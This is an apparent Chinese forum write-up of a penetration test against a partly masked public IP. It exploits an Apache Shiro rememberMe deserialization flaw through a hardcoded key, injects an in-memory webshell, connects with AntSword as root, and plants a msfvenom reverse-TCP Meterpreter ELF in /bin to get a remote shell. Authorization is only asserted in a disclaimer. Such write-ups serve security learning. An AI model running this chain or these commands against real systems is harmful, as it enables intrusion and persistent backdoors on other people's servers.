记一次实战 Shiro反序列化内网上线
Shiro反序列化内网上线说明:
此贴仅分享用于各安全人员进行安全学习提供思路,或有合法授权的安全测试,请勿参考用于其他用途,如有,后果自负。
感谢各位大佬的关注
目标:152.xxx.xxx.xxx
目的:通过信息收集或其他方式寻找到了一枚shiro反序列化的漏洞,并进行了内网渗透测试工作
类型:Web反序列化漏洞
介绍:
Shiro 是 Java安全框架通过序列化,进行AES密钥做身份验证加密(cookie加密)通过shiro硬编码 比证密钥 获取目标利用链并进行上线操作
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657889058879-5a8b6e44-cbd2-4641-bd63-44049b855b8c.png#clientId=u3b1529ff-2511-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=165&id=u1a1f8676&margin=%5Bobject%20Object%5D&name=image.png&originHeight=206&originWidth=746&originalType=binary&ratio=1&rotation=0&showTitle=false&size=46275&status=done&style=none&taskId=u67250c78-4816-4eb3-a7f0-dc5d798ad53&title=&width=596.8
本文的起因是在一次渗透测试中,挖掘到了一个shiro反序列化 故进行了内网渗透尝试
特征:
在请求消息中 构造cookie
添加一个参数rememberMe=xxx,观察响应消息头中的Set-Cookie是否有rememberMe=deleteMe;如果有则说明使用了shiro框架
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657891009475-a2e849b0-e812-4b0c-bdbe-7120910f3f58.png#clientId=uaf71bc80-23d1-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=304&id=u919d6b48&margin=%5Bobject%20Object%5D&name=image.png&originHeight=380&originWidth=1159&originalType=binary&ratio=1&rotation=0&showTitle=false&size=272235&status=done&style=none&taskId=ue5effb30-565d-4e58-a48d-b0e5fde124b&title=&width=927.2
信息收集
这里我采用的是网络空间测绘引擎、目录信息收集、域名收集 等进行了资产整合利用
将搜集的信息 导出整合数据 备用
https://img2022.cnblogs.com/blog/2902742/202207/2902742-20220715222552717-119495901.png
[*]利用检测工具 减少误判率
这里我用的是java开发的shiroScan 检测工具
*扫之前记得开代理 查询当前代理IP
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657884019825-36d60959-a459-4174-9591-b3761636b5d6.png#clientId=u9d6f330f-d99a-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=689&id=uf6916be2&margin=%5Bobject%20Object%5D&name=image.png&originHeight=861&originWidth=1731&originalType=binary&ratio=1&rotation=0&showTitle=false&size=201688&status=done&style=none&taskId=u27c03489-e95b-47cb-84cc-2be09b261e2&title=&width=1384.8
在当前目录下开始对目标进行扫描 再次筛选存活并可利用的网站
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657889399707-3557b743-4b0f-4a36-a6d5-bc10b2272b27.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=542&id=u26d61d48&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=1520&originalType=binary&ratio=1&rotation=0&showTitle=false&size=391007&status=done&style=none&taskId=ua821a0bd-d65f-4c20-b5d4-14994c0c2d4&title=&width=1216
将筛选结果导出保存
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657889446893-d72762c4-d3c0-4e77-a0a0-f062d5299591.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=665&id=u741f2cdd&margin=%5Bobject%20Object%5D&name=image.png&originHeight=831&originWidth=1266&originalType=binary&ratio=1&rotation=0&showTitle=false&size=269374&status=done&style=none&taskId=ua3f7d497-2e96-4fe7-850d-443c7a082c7&title=&width=1012.8
漏洞利用
[*]这边我利用shiro利用工具对目标进行”硬编码“ 密钥爆破操作
这里我用的是java开发的shiro利用工具
筛选目标时 发现目标存在Shiro反序列化漏洞 采用了硬编码
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890070094-933efb87-b094-4cfa-b86b-2b9867337939.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=138&id=u24881d82&margin=%5Bobject%20Object%5D&name=image.png&originHeight=172&originWidth=835&originalType=binary&ratio=1&rotation=0&showTitle=false&size=60401&status=done&style=none&taskId=u8ce33b0f-edf3-4432-8875-09a6fdaa8c1&title=&width=668
在工具内进行功能区的利用,在爆破完成后,对目标进行目录扫描。【记得开代理】
kali中 开个小代理
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657885376473-fe9035cf-dd87-45b9-8a30-afd8f1f49cc8.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=576&id=u623f219b&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=1280&originalType=binary&ratio=1&rotation=0&showTitle=false&size=295068&status=done&style=none&taskId=u0d2c91a6-93cf-4475-8fe9-3d5a39c28e0&title=&width=1024
2.这边对目标进行目录收集
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657885447715-21490279-9b91-4e5c-bfba-d4071a981bb4.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0.7111&crop=1&crop=1&from=paste&height=251&id=ufa26ed84&margin=%5Bobject%20Object%5D&name=image.png&originHeight=314&originWidth=1118&originalType=binary&ratio=1&rotation=0&showTitle=false&size=99353&status=done&style=none&taskId=u8148cece-d9f8-4907-8432-08ad9e0651d&title=&width=894
3.这边当即对 目标目录 进行内存马注入操作
拓展一下:
内存马 是无文件渗透测试的一种常用手段
webshell的变迁过程大致如下所述:
web服务器管理页面——> 大马——>小马拉大马——>一句话木马——>加密一句话木马——>加密内存马
因为传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到,故内存马使用越来越多
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890408105-eb624b72-46e6-4fa8-93b0-28df097650bc.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=222&id=udef18496&margin=%5Bobject%20Object%5D&name=image.png&originHeight=278&originWidth=1255&originalType=binary&ratio=1&rotation=0&showTitle=false&size=26900&status=done&style=none&taskId=u99fe004f-5839-4bc4-88a5-215c1daaed8&title=&width=1004
这边我使用 蚁剑 尝试连接成功
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890440474-5921ff09-572e-4cd7-8478-1434d6a79f9c.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=649&id=ucfafaefb&margin=%5Bobject%20Object%5D&name=image.png&originHeight=811&originWidth=1193&originalType=binary&ratio=1&rotation=0&showTitle=false&size=134970&status=done&style=none&taskId=ue3cd8a92-00cc-48ac-8cf7-ceaebb03dff&title=&width=954.4
在蚁剑的命令行中执行 查询命令时 发现该目标是root用户 Linux系统 初步判断是Debian
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657886275836-a97c14d9-9776-4f01-aab1-c87cdd6971f4.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=93&id=u36c9bbec&margin=%5Bobject%20Object%5D&name=image.png&originHeight=116&originWidth=996&originalType=binary&ratio=1&rotation=0&showTitle=false&size=12363&status=done&style=none&taskId=u523457be-1599-40ea-a4f3-ab7c5cf60e6&title=&width=796.8
目标上线
这里开始利用 metasploit 安全漏洞检测工具中的_msfvenom payload生成器_使目标上线
msfvenom生成 Linux 后门程序,这里刚开始我是使用的cobalt strike 中生成的Java后门程序发现行不通 可能是因为目标JDK的版本 导致不兼容的原因,故利用metasploit的msfvenom生成后门程序 结合“蚁剑”上传后门程序 使目标成功进行执行上线操作
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost= lport=22715 -f elf -o 123.elf
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890569118-c6653c53-836b-4296-8578-b7cd8a818a85.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=304&id=ue3f48ee2&margin=%5Bobject%20Object%5D&name=image.png&originHeight=380&originWidth=1392&originalType=binary&ratio=1&rotation=0&showTitle=false&size=137524&status=done&style=none&taskId=ub5784c8c-1364-4652-8494-6cd58336fdc&title=&width=1113.6
将生成的后门程序 上传至目标 并利用蚁剑的命令行执行此文件 记得改文件执行权限
chmod 777 123.elf;
chmod u+x 123.elf;
./123.elf 执行文件
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890745532-c40c8523-8f5d-43bc-acf6-63d36c63aa6e.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=514&id=u8e2e78ee&margin=%5Bobject%20Object%5D&name=image.png&originHeight=643&originWidth=1580&originalType=binary&ratio=1&rotation=0&showTitle=false&size=191739&status=done&style=none&taskId=u394d07ab-acf0-4b6c-b5c0-7ed936f207f&title=&width=1264
后门程序“123.elf” 成功上传至目标/bin目录下
执行msfconsole 进入MSF命令接口 执行快速监听等待目标成功上线
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890710595-5bf18bc9-ea20-4dc4-a1ce-59d60898cb5c.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=388&id=u6a25344e&margin=%5Bobject%20Object%5D&name=image.png&originHeight=485&originWidth=1303&originalType=binary&ratio=1&rotation=0&showTitle=false&size=141975&status=done&style=none&taskId=u729b624b-1409-4a55-ab62-dde428e27c8&title=&width=1042.4
利用meterpreter成功拿shell
它是攻击载荷能够获得目标系统的一个Meterpreter shell的链接
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657886446619-22f5dc6e-2180-4c6d-a1e0-f2dd88c441d9.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=446&id=u2a9bb074&margin=%5Bobject%20Object%5D&name=image.png&originHeight=558&originWidth=1110&originalType=binary&ratio=1&rotation=0&showTitle=false&size=50605&status=done&style=none&taskId=u7e06df76-12dc-4251-8660-b65004c750e&title=&width=888
内网渗透 Linux信息收集
查询主机名
2>/dev/null,作用是丢弃错误信息
hostname 2>/dev/null
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890799651-cee38c5a-3461-4831-9c4e-9ea2ef1de8df.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=144&id=u012959cb&margin=%5Bobject%20Object%5D&name=image.png&originHeight=180&originWidth=556&originalType=binary&ratio=1&rotation=0&showTitle=false&size=27608&status=done&style=none&taskId=uf0be1324-6a97-4b59-8f5d-5b9fe5badc4&title=&width=444.8
查询系统名称
cat /etc/issue
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657887151616-78f3067f-0642-4bb1-a9d6-59a6e51a91ce.png#clientId=u9650ef87-b70d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=43&id=u355a5cfd&margin=%5Bobject%20Object%5D&name=image.png&originHeight=54&originWidth=269&originalType=binary&ratio=1&rotation=0&showTitle=false&size=2847&status=done&style=none&taskId=ub8db0ce5-77b9-4e75-80e7-6af0503dc52&title=&width=215.2
查询内核版本
查询系统和内核的所有相关信息
依次为内核名称,主机名,内核版本号,内核版本,硬件架构名称,处理器类型,硬件平台类型,操作系统名称
uname -a
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890817705-8e255581-fb1f-440a-9d57-64f133fba70a.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=55&id=u1bc4b2a2&margin=%5Bobject%20Object%5D&name=image.png&originHeight=69&originWidth=1170&originalType=binary&ratio=1&rotation=0&showTitle=false&size=27226&status=done&style=none&taskId=u923166cb-5ab8-4c41-9a14-30f04244a35&title=&width=936
查询CPU信息
cat /proc/cpuinfo
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657887334220-35df6936-c7f1-4808-9412-9397bf2ca9f0.png#clientId=u9650ef87-b70d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=187&id=u8f644322&margin=%5Bobject%20Object%5D&name=image.png&originHeight=234&originWidth=668&originalType=binary&ratio=1&rotation=0&showTitle=false&size=16575&status=done&style=none&taskId=u49417e4e-8158-4444-94cb-6d9af1d82d3&title=&width=534.4
查询磁盘信息
查询文件系统磁盘的详细信息
包括磁盘名称,内存大小,已用空间,可用空间,挂载点
查看本地磁盘信息
df -lh
查看所有磁盘信息
df -ah
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657887500845-788aaf6d-1817-407c-859a-b873b4c71f24.png#clientId=u9650ef87-b70d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=173&id=uf8ad2964&margin=%5Bobject%20Object%5D&name=image.png&originHeight=216&originWidth=719&originalType=binary&ratio=1&rotation=0&showTitle=false&size=26330&status=done&style=none&taskId=uf4bddca0-60b5-4ce7-9f66-c8b99aff6b4&title=&width=575.2
查询网络连接状态
访问网络连接状态及其相关信息的程序
https://cdn.nlark.com/yuque/0/2022/png/12645031/1657890853386-9ad92a2e-daa0-4245-b5c4-f09b82a21278.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=196&id=u089b3cad&margin=%5Bobject%20Object%5D&name=image.png&originHeight=245&originWidth=1179&originalType=binary&ratio=1&rotation=0&showTitle=false&size=103112&status=done&style=none&taskId=u5841fccf-ea48-4379-ae51-cb1b847c3e7&title=&width=943.2
这里可以看到在目标执行中的"123.elf"后门程序
点到为止 测试结束
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]